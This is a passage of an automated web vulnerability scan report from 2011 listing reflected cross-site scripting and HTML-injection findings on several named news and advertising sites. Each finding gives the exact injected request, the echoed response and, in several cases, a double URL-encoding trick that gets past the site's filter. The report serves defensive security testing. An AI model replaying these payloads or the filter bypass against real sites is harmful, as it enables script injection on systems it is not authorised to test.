<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/blogs70f75';alert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1';
}

//-->
...[SNIP]...

4.858. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11ddd'%3balert(1)//e0aca46f7df was submitted in the REST URL parameter 1. This input was echoed as 11ddd';alert(1)//e0aca46f7df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 14:11:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/blogs11ddd';alert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm';
}

//-->
...[SNIP]...

4.859. http://www.nydailynews.com/blogs70f75/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.nydailynews.com
Path:	/blogs70f75/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28224'%3b7ef459ee8f9 was submitted in the REST URL parameter 1. This input was echoed as 28224';7ef459ee8f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /blogs70f7528224'%3b7ef459ee8f9/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296227725346:ss=1296227725346; __vrf=75ibpjczis64gvwq;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:06:40 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/blogs70f7528224';7ef459ee8f9/index.html';
}

//-->
...[SNIP]...

4.860. http://www.paperg.com/jsfb/embed.php [bid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 32aad%3balert(1)//a80c7501128 was submitted in the bid parameter. This input was echoed as 32aad;alert(1)//a80c7501128 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfb/embed.php?pid=3922&bid=212332aad%3balert(1)//a80c7501128 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:03:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=jnjnrfnrlrhjvfc5f8a69ussc1; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 37192

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL212332aad;alert(1)//a80c7501128 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=212332aad%3balert(1)//a80c7501128';

//-- getting all script elements from document
var scripts = document.getElementsByTagName('script');
...[SNIP]...

4.861. http://www.paperg.com/jsfb/embed.php [bid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61da6'-alert(1)-'499123cfafb was submitted in the bid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfb/embed.php?pid=3922&bid=212361da6'-alert(1)-'499123cfafb HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:03:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=qbs5k2mhh2kob2880lsp47crn4; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 37193

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL212361da6'-alert(1)-'499123cfafb = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=212361da6'-alert(1)-'499123cfafb';

   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];

...[SNIP]...

4.862. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3fd3'-alert(1)-'e011e92194 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfb/embed.php?pid=3922&bid=2123&d3fd3'-alert(1)-'e011e92194=1 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:03:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=80eme1m02vfhdjg7jab06jrcq6; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39301

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123&d3fd3'-alert(1)-'e011e92194=1';

   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];
...[SNIP]...

4.863. http://www.paperg.com/jsfb/embed.php [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d87ab'-alert(1)-'c3e491e2d18 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfb/embed.php?pid=3922d87ab'-alert(1)-'c3e491e2d18&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:03:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=bh0qdin2b2rcmfaehtu9i1rq44; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39299

var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.paperg.com/jsfb/embed.php?pid=3922d87ab'-alert(1)-'c3e491e2d18&bid=2123';

   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length
...[SNIP]...

4.864. http://www.quantcast.com/p-352ZWwG8I7OVQ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/p-352ZWwG8I7OVQ

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90702"><a>8af2ecf874f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-352ZWwG8I7OVQ90702"><a>8af2ecf874f HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 29 Jan 2011 04:37:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" p-352ZWwG8I7OVQ90702"><a>8af2ecf874f" />
...[SNIP]...

4.865. http://www.quantcast.com/p-352ZWwG8I7OVQ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/p-352ZWwG8I7OVQ

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94ea2<a>2d83a5faf87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-352ZWwG8I7OVQ94ea2<a>2d83a5faf87 HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 29 Jan 2011 04:37:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> p-352ZWwG8I7OVQ94ea2<a>2d83a5faf87</em>
...[SNIP]...

4.866. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b93c6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2530141dfcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b93c6"><script>alert(1)</script>2530141dfcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /about-us?b93c6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2530141dfcb=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/about-us?b93c6"><script>alert(1)</script>2530141dfcb=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.867. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37b12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1404705397 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37b12"><script>alert(1)</script>f1404705397 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /advertise?37b12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1404705397=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/advertise?37b12"><script>alert(1)</script>f1404705397=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.868. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8086b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ea98ea0c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8086b"><script>alert(1)</script>2ea98ea0c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop?8086b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ea98ea0c61=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop?8086b"><script>alert(1)</script>2ea98ea0c61=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.869. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/know-how

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fa0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b650f6629c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fa0"><script>alert(1)</script>2b650f6629c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/know-how?36fa0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b650f6629c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/know-how?36fa0"><script>alert(1)</script>2b650f6629c=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.870. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-boats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3aa39f41117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55f54"><script>alert(1)</script>3aa39f41117 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/new-boats?55f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3aa39f41117=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/new-boats?55f54"><script>alert(1)</script>3aa39f41117=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.871. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-gear

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45204%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0b510e9b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45204"><script>alert(1)</script>a0b510e9b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /boat-shop/new-gear?45204%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0b510e9b6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

